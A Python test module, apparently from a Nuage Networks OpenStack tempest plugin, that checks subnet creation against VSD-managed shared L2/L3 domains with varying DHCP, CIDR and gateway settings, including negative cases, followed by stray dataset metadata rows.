VALID_CIDR_GW = '3.22.111.1'
#
EXPECT_DHCP_ENABLE_TRUE = "enable_dhcp in subnet must be True"
EXPECT_DHCP_ENABLE_FALSE = "enable_dhcp in subnet must be False"
EXPECT_CIDRS_DO_NOT_MATCH = "do not match"
EXPECT_GATEWAY_IN_CIDR = "Invalid input for operation: " \
"Gateway is not valid on subnet."
@nuage_test.class_header(tags=[tags.ML2, tags.VSD_MANAGED])
class VSDPublicResourcesML2Test(
base_vsd_public_resources.BaseVSDPublicResources):
os_shared_network = False
if Topology.before_openstack('Newton'):
failure_type = exceptions.ServerFault
dhcp_port = False
else:
failure_type = exceptions.BadRequest
dhcp_port = True
@classmethod
def skip_checks(cls):
super(VSDPublicResourcesML2Test, cls).skip_checks()
if not Topology.is_ml2:
raise cls.skipException('Skipping ml2 tests with '
'nuage-core plugin')
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_without_gw_ip(self):
# Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
# and these are linked
vsd_l2dom_unmgd = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == False
# a valid CIDR
# nuagenet == UUID of VSD-L2-domain
# no IP
os_shared_network=self.os_shared_network,
enable_dhcp=False,
cidr=VALID_CIDR,
gateway_ip='',
# Then the OS subnet has
# an OS allocation pool covering the full CIDR range
# gateway_ip equal to None
expected_gateway_ip=None,
# and has no network:dhcp:nuage port
expect_network_dhcp_nuage_port=False,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the valid CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain is empty
expect_vm_ip_addresses_equal=''
)
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_with_gw_ip_neg(self):
# Pass on liberty, fail on kilo
# Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
# and these are linked
vsd_l2dom_unmgd = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == False
# a valid CIDR
# nuagenet == UUID of VSD-L2-domain
os_shared_network=self.os_shared_network,
enable_dhcp=False,
gateway_ip=VALID_CIDR_GW,
cidr=VALID_CIDR,
# Then the OS subnet has
# an OS allocation pool covering the full CIDR range
# gateway_ip equal to None
expected_gateway_ip=None,
# and no network:dhcp:nuage port
expect_network_dhcp_nuage_port=False,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the valid CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain is empty
expect_vm_ip_addresses_equal=''
)
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_no_gateway(self):
# Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
# And these are linked
vsd_l2dom_unmgd = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == False
# a valid CIDR
# nuagenet == UUID of VSD-L2-domain
# no-gateway
os_shared_network=self.os_shared_network,
enable_dhcp=False,
cidr=VALID_CIDR,
gateway_ip=None,
# Then the OS subnet has
# gateway_ip equal to None
expected_gateway_ip=None,
# and no network:dhcp:nuage port
expect_network_dhcp_nuage_port=False,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the valid CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain is empty
expect_vm_ip_addresses_equal=''
)
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_without_gateway(self):
# Given I have a VSD-L2-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
# And these are linked
vsd_l2dom_unmgd = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == False
# a valid CIDR
# nuagenet == UUID of VSD-L2-domain
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip='',
# Then the OS subnet has
# gateway_ip equal to None
expected_gateway_ip=None,
# and network:dhcp:nuage port exist from Newton onwards
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the valid CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain is empty
expect_vm_ip_addresses_equal=True
)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_with_gw_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom_unmgd = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
if Topology.at_openstack('kilo'):
self.assertRaisesRegex(
exceptions.ServerFault,
"create_subnet_postcommit failed.",
self._check_vsd_l2_shared_l2_unmgd,
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip=base_vsd_managed_networks.VSD_L2_SHARED_MGD_GW,
expect_network_dhcp_nuage_port=False,
expected_gateway_ip=None,
expect_vm_ip_addresses_equal=True
)
else:
# In ML2 Liberty this is not a negative test so it should pass
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == False
# a valid CIDR
# nuagenet == UUID of VSD-L2-domain
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip=base_vsd_managed_networks.VSD_L2_SHARED_MGD_GW,
# Then the OS subnet has
# gateway_ip equal to None
expected_gateway_ip=None,
# and no network:dhcp:nuage port
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the valid CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain is empty
expect_vm_ip_addresses_equal=True
)
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_no_gateway(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom_unmgd = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == True
# CIDR == CIDR of VSD-L2-Shared-domain
# nuagenet == UUID of VSD-L2-domain
# no-gateway
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip=None,
# Then the OS subnet has
# gateway_ip equal to None
expected_gateway_ip=None,
# and no network:dhcp:nuage port
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain equals
# the OS VM-IP-address
expect_vm_ip_addresses_equal=True
)
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_without_gw_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom_unmgd = \
self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom_unmgd,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip='', # bad, must be VSD_L2_SHARED_MGD_OPT3
must_fail=True)
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_with_gateway(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# and these are linked
vsd_l2dom_unmgd = \
self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._check_vsd_l2_shared_l2_unmgd(
vsd_l2dom_unmgd=vsd_l2dom_unmgd,
# When I create an OS subnet with
# enable_dhcp == True
# CIDR == CIDR of VSD-L2-Shared-domain
# nuagenet == UUID of VSD-L2-domain
# gateway-ip == gateway-ip in DHCP-option-3
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=VSD_L2_SHARED_MGD_OPT3,
# Then the OS subnet has
# gateway_ip equal to DHCP-options-3 of VSD-L2-Shared-domain
expected_gateway_ip=VSD_L2_SHARED_MGD_OPT3,
# and network:dhcp:nuage port exist from Newton onwards
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the CIDR range
# And the VM-interface-IP-address in the VSD-L2-domain equals
# the OS VM-IP-address
expect_vm_ip_addresses_equal=True
)
@nuage_test.header()
@decorators.attr(type=['negative'])
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_no_gateway(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# and these are linked
# Then I expect a failure from OS
# Supported only when dhcp_option-3 is NOT set
vsd_l2dom_unmgd = \
self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom_unmgd,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=None, # bad, must be VSD_L2_SHARED_MGD_OPT3
must_fail=True)
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_without_gateway(self):
# Given I have a VSD-L3-domain in a public zone
# (i.e. without IPAM (/ UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._check_vsd_l3_shared_l2_unmgd(
# When I create an OS subnet with
# enable_dhcp == True
# CIDR == CIDR of VSD-L3-Shared-domain
# nuagenet == UUID of VSD-L3-domain-public-zone-subnet
vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip='',
# Then the OS subnet has
# gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
expected_gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
# and network:dhcp:nuage port exist from Newton onwards
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the CIDR range
# And the VM-interface-IP-address in the VSD-L3-domain equals
# the OS VM-IP-address
# And the VM-interface-IP-address is different from the
# gateway_ip address
expect_vm_ip_addresses_equal=True
)
@nuage_test.header()
@decorators.attr(type='smoke')
def test_vsd_l3_shared_mgd_l3_unmgd_with_gateway(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._check_vsd_l3_shared_l2_unmgd(
vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
# When I create an OS subnet with
# enable_dhcp == True
# CIDR == CIDR of VSD-L3-Shared-domain
# nuagenet == UUID of VSD-L3-domain
# gateway-ip == gateway-ip of VSD-L3-Shared-domain
enable_dhcp=True,
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
# Then the OS subnet has
# gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
expected_gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
# and network:dhcp:nuage port exist from Newton onwards
expect_network_dhcp_nuage_port=self.dhcp_port,
#
# When I spin a VM in this network
# Then the OS VM-IP-address is in the CIDR range
# And the VM-interface-IP-address in the VSD-L3-domain equals
# the OS VM-IP-address
# And the OS VM-IP-address is different from the gateway-ip
expect_vm_ip_addresses_equal=True
)
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_no_gateway_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=None, # bad, must be <base>.VSD_L3_SHARED_MGD_GW
must_fail=True)
@nuage_test.header()
def test_vsd_l3_shared_mgd_opt3_l2_unmgd_with_gateway(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with DHCP-options-3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgdopt3_linked_to_vsdl3subnetunmgd(
VSD_L3_SHARED_MGD_OPT3)
self._check_vsd_l3_shared_l2_unmgd(
vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
# When I create an OS subnet with
# enable_dhcp == True
# CIDR == CIDR of VSD-L3-Shared-domain
# nuagenet == UUID of VSD-L3-domain
# gateway-ip == gateway-ip of VSD-L3-Shared-domain
enable_dhcp=True,
cidr=VSD_L3_SHARED_MGD_OPT3_CIDR,
gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
# Then the OS subnet has
# an OS allocation pool covering the full CIDR range
# (except the GW-ip)
# gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
expected_gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
# and network:dhcp:nuage port exist from Newton onwards
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the CIDR range
# And the VM-interface-IP-address in the VSD-L3-domain equals
# the OS VM-IP-address
# And the OS VM-IP-address is different from the gateway-ip
expect_vm_ip_addresses_equal=True
)
def test_vsd_l3_shared_mgd_opt3_0000_l2_unmgd_with_gateway(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with DHCP-options-3 0.0.0.0
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgdopt3_linked_to_vsdl3subnetunmgd(
dhcp_option_3='0.0.0.0')
self._check_vsd_l3_shared_l2_unmgd(
vsd_l3_dom_subnet=vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
# When I create an OS subnet with
# enable_dhcp == True
# CIDR == CIDR of VSD-L3-Shared-domain
# nuagenet == UUID of VSD-L3-domain
# gateway-ip == gateway-ip of VSD-L3-Shared-domain
enable_dhcp=True,
cidr=VSD_L3_SHARED_MGD_OPT3_CIDR,
gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
# Then the OS subnet has
# an OS allocation pool covering the full CIDR range
# (except the GW-ip)
# gateway_ip equal to gateway-ip of VSD-L3-Shared-domain
expected_gateway_ip=VSD_L3_SHARED_MGD_OPT3_GW,
# and network:dhcp:nuage port exist from Newton onwards
expect_network_dhcp_nuage_port=self.dhcp_port,
# When I spin a VM in this network
# Then the OS VM-IP-address is in the CIDR range
# And the VM-interface-IP-address in the VSD-L3-domain equals
# the OS VM-IP-address
# And the OS VM-IP-address is different from the gateway-ip
expect_vm_ip_addresses_equal=True,
)
# #########################################################################
# # Negative testcases
# #########################################################################
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_unmgd_l2_unmgd_wo_gw_enable_dhcp_neg(
self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain without IPAM (i.e. UnManaged)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedunmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True, # bad
cidr=VALID_CIDR, # any CIDR, doesn't matter
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_wo_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_with_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip=base_vsd_managed_networks.VSD_L2_SHARED_MGD_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_no_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L2_SHARED_MGD_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_wo_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_unmgd_with_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=VALID_CIDR_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_l2_no_gw_unmgd_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgd_lnkd_to_vsdl2domunmgd()
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt3_l2_unmgd_without_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_with_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=VSD_L2_SHARED_MGD_OPT3_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_no_gw_no_dhcp_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=VSD_L2_SHARED_MGD_OPT3_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_wo_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_with_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=VALID_CIDR_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l2_shared_mgd_opt_3_l2_unmgd_no_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L2-domain without IPAM (i.e. unmanaged)
# And I have a VSD-L2-Shared-domain with IPAM (i.e. managed)
# with DHCP-option 3 set
# And these are linked
vsd_l2dom = self._given_vsdl2sharedmgdopt3_linked_to_vsdl2domunmgd(
VSD_L2_SHARED_MGD_OPT3)
self._create_vsd_mgd_subnet(
vsd_l2dom,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_wo_gw_no_dhcp_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_with_gw_no_dhcp_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=base_vsd_managed_networks.VSD_L3_SHARED_MGD_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_no_gw_no_dhcp_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=False, # bad
cidr=base_vsd_managed_networks.VSD_L3_SHARED_MGD_CIDR,
gateway_ip=None,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_wo_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip='',
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_with_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=VALID_CIDR_GW,
must_fail=True)
@decorators.attr(type=['negative'])
@nuage_test.header()
def test_vsd_l3_shared_mgd_l3_unmgd_no_gw_cidr_mismatch_neg(self):
# Given I have a VSD-L3-domain without IPAM (i.e. UnManaged)
# And I have a VSD-L3-Shared-domain with IPAM (i.e. Managed)
# with dhcp options 3
# and these are linked
vsd_l3_unmgd_subnet = \
self._given_vsdl3sharedmgd_lnkd_to_vsdl2subnetunmgd()
self._create_vsd_mgd_subnet(
vsd_l3_unmgd_subnet,
os_shared_network=self.os_shared_network,
enable_dhcp=True,
cidr=VALID_CIDR, # bad
gateway_ip=None,
must_fail=True)
@nuage_test.class_header(tags=[tags.ML2, tags.VSD_MANAGED])
class VSDPublicSharedResourcesML2Test(VSDPublicResourcesML2Test):
os_shared_network = True
| 42.075426
| 79
| 0.637715
| 4,825
| 34,586
| 4.236477
| 0.047461
| 0.030576
| 0.047894
| 0.029059
| 0.912969
| 0.906218
| 0.894721
| 0.88797
| 0.885084
| 0.878773
| 0
| 0.023451
| 0.288614
| 34,586
| 821
| 80
| 42.126675
| 0.807348
| 0.318308
| 0
| 0.792735
| 0
| 0
| 0.021487
| 0.001038
| 0
| 0
| 0
| 0
| 0.002137
| 1
| 0.07265
| false
| 0
| 0.017094
| 0
| 0.098291
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f21def0abd39bf598dafbf4f177dd456a3970e0c
| 5,591
|
py
|
Python
|
makeDome.py
|
bttaylor/TactileMaps
|
d09d70d8f12e6e2b90f8c7cb1ea0b5d72765ef45
|
[
"MIT"
] | null | null | null |
makeDome.py
|
bttaylor/TactileMaps
|
